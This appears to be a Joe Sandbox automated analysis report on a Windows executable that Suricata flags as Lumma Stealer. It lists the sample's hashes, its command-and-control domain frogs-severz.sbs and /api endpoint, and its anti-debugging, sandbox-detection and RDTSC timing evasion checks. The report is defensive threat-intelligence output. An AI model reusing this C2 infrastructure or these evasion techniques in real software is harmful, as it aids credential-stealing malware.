Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1562276
MD5:1959840f03733001022c3aa78866b3e0
SHA1:a6a9800d7009ef076f66deecd050261271d6e3c0
SHA256:e38e917a486da4cd7fd65caf9761101feedc4a4d0feb047ad1b14e3423f3e903
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7616 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1959840F03733001022C3AA78866B3E0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-25T12:58:19.750219+010020283713Unknown Traffic192.168.2.749706104.21.88.250443TCP
2024-11-25T12:58:21.491196+010020283713Unknown Traffic192.168.2.749707104.21.88.250443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-25T12:58:20.536502+010020546531A Network Trojan was detected192.168.2.749706104.21.88.250443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-25T12:58:20.536502+010020498361A Network Trojan was detected192.168.2.749706104.21.88.250443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: file.exeAvira: detected
Antivirus detection for URL or domain
Source: https://frogs-severz.sbs/WAvira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/api(wWdtPAvira URL Cloud: Label: malware
Source: https://frogs-severz.sbs//Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/api(wlAvira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/apiCAvira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/apiRAvira URL Cloud: Label: malware
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exeJoe Sandbox ML: detected
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], bl3_2_0098CF05
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h]3_2_0098E0D8
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax3_2_009BF8D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax3_2_009BF8D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+14h]3_2_009898F0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax3_2_009BB8E0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx3_2_009BB8E0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax3_2_0098C02B
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh3_2_009BC040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh3_2_009BC040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h3_2_009BC040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh3_2_009BC040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_009A0870
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax3_2_009BB860
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+14h]3_2_0098E970
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], cx3_2_0098EA38
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]3_2_0098E35B
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx3_2_0098BC9D
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp3_2_00985C90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp3_2_00985C90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_009A8CB0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h3_2_009BBCE0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]3_2_0098AD00
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [edi]3_2_009A5E90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h]3_2_009877D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax3_2_009877D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch]3_2_009C0F60

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49706 -> 104.21.88.250:443
Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49706 -> 104.21.88.250:443
Source: Joe Sandbox ViewIP Address: 104.21.88.250 104.21.88.250
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49707 -> 104.21.88.250:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49706 -> 104.21.88.250:443
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
Source: global trafficDNS traffic detected: DNS query: frogs-severz.sbs
Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
Source: file.exe, 00000003.00000003.1331160862.0000000001524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1330974839.0000000001517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/
Source: file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs//
Source: file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/W
Source: file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api
Source: file.exe, 00000003.00000003.1330974839.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1336154740.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api(wWdtP
Source: file.exe, 00000003.00000003.1330974839.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1336154740.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api(wl
Source: file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apiC
Source: file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apiR
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.7:49706 version: TLS 1.2

System Summary

barindex
PE file contains section with special chars
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009B90303_2_009B9030
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009889A03_2_009889A0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0098CF053_2_0098CF05
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE3_2_00B588BE
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0098E0D83_2_0098E0D8
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009BF8D03_2_009BF8D0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009898F03_2_009898F0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009BB8E03_2_009BB8E0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009840403_2_00984040
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009868403_2_00986840
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009BC0403_2_009BC040
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009A08703_2_009A0870
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009861A03_2_009861A0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009B41D03_2_009B41D0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0098E9703_2_0098E970
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00C201283_2_00C20128
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00985AC93_2_00985AC9
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00984AC03_2_00984AC0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00A642D23_2_00A642D2
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009892103_2_00989210
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0098B2103_2_0098B210
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00982B803_2_00982B80
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0099DB303_2_0099DB30
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0099FB603_2_0099FB60
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00985C903_2_00985C90
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009C0C803_2_009C0C80
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009A8CB03_2_009A8CB0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009894D03_2_009894D0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00986CC03_2_00986CC0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009B24E03_2_009B24E0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B504063_2_00B50406
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0098542C3_2_0098542C
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009835803_2_00983580
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009C15803_2_009C1580
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B5758B3_2_00B5758B
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0098AD003_2_0098AD00
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009995303_2_00999530
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009A3D703_2_009A3D70
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009A5E903_2_009A5E90
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00AF8E9C3_2_00AF8E9C
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009A7E203_2_009A7E20
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009A06503_2_009A0650
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009A17903_2_009A1790
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009BC7803_2_009BC780
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009B87B03_2_009B87B0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009877D03_2_009877D0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009827D03_2_009827D0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B51F3C3_2_00B51F3C
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009A87703_2_009A8770
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009C0F603_2_009C0F60
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exeStatic PE information: Section: ZLIB complexity 0.9992123463114754
Source: file.exeStatic PE information: Section: izyzjrki ZLIB complexity 0.9938021708817237
Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engineClassification label: mal100.evad.winEXE@1/0@2/1
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_009B27B0 CoCreateInstance,3_2_009B27B0
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: file.exeStatic file information: File size 1846784 > 1048576
Source: file.exeStatic PE information: Raw size of izyzjrki is bigger than: 0x100000 < 0x199000

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 3.2.file.exe.980000.0.unpack :EW;.rsrc:W;.idata :W; :EW;izyzjrki:EW;beoowxtj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;izyzjrki:EW;beoowxtj:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: file.exeStatic PE information: real checksum: 0x1c8d28 should be: 0x1d1d0c
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: izyzjrki
Source: file.exeStatic PE information: section name: beoowxtj
Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00C088CA push 272CCDBFh; mov dword ptr [esp], edi3_2_00C0895F
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push 407811EAh; mov dword ptr [esp], edi3_2_00B588C9
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push 16B5767Fh; mov dword ptr [esp], edx3_2_00B5890B
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push ecx; mov dword ptr [esp], edx3_2_00B5893B
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push eax; mov dword ptr [esp], ebx3_2_00B5893F
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push edx; mov dword ptr [esp], ebp3_2_00B58985
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push ecx; mov dword ptr [esp], 6E69595Bh3_2_00B589C7
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push ecx; mov dword ptr [esp], eax3_2_00B589F0
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push ebp; mov dword ptr [esp], edx3_2_00B58A97
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push edi; mov dword ptr [esp], ebp3_2_00B58B3F
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push edi; mov dword ptr [esp], 0664B9FBh3_2_00B58BC3
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push esi; mov dword ptr [esp], edx3_2_00B58BEF
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push edi; mov dword ptr [esp], 4BBDE7D3h3_2_00B58C55
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push esi; mov dword ptr [esp], edx3_2_00B58CE2
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push esi; mov dword ptr [esp], edi3_2_00B58CED
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push esi; mov dword ptr [esp], edi3_2_00B58DE9
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push ecx; mov dword ptr [esp], eax3_2_00B58E5F
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push 12F80726h; mov dword ptr [esp], eax3_2_00B58E7C
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push 65C3643Ah; mov dword ptr [esp], ebx3_2_00B58F6E
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push eax; mov dword ptr [esp], edi3_2_00B58FDC
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push edi; mov dword ptr [esp], ecx3_2_00B59005
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push 6DB7928Ch; mov dword ptr [esp], eax3_2_00B590B7
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push ebx; mov dword ptr [esp], 0C8F5CFFh3_2_00B590C8
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push 4C961543h; mov dword ptr [esp], eax3_2_00B590E1
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push edx; mov dword ptr [esp], ebx3_2_00B5916B
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push ebp; mov dword ptr [esp], ebx3_2_00B5917A
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push 4EE5EC02h; mov dword ptr [esp], eax3_2_00B5926C
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push 1772D8F1h; mov dword ptr [esp], ecx3_2_00B59297
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push ebx; mov dword ptr [esp], esi3_2_00B59389
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push esi; mov dword ptr [esp], edi3_2_00B593A1
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00B588BE push ebp; mov dword ptr [esp], edi3_2_00B593D0
Source: file.exeStatic PE information: section name: entropy: 7.97874522345175
Source: file.exeStatic PE information: section name: izyzjrki entropy: 7.952961646719837

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCFA6 second address: 9DCFAC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5349E second address: B534A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B534A2 second address: B534A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5ED18 second address: B5ED1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5EFEA second address: B5EFEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F16D second address: B5F179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F35AD0C7238h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F179 second address: B5F180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F180 second address: B5F1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c jo 00007F35AD0C723Ch 0x00000012 jns 00007F35AD0C7236h 0x00000018 jmp 00007F35AD0C7249h 0x0000001d push eax 0x0000001e push edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F318 second address: B5F31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F31E second address: B5F322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F322 second address: B5F328 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F328 second address: B5F343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7245h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F343 second address: B5F347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60FC8 second address: B60FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B610A5 second address: B610A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B610A9 second address: B610BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jl 00007F35AD0C7240h 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
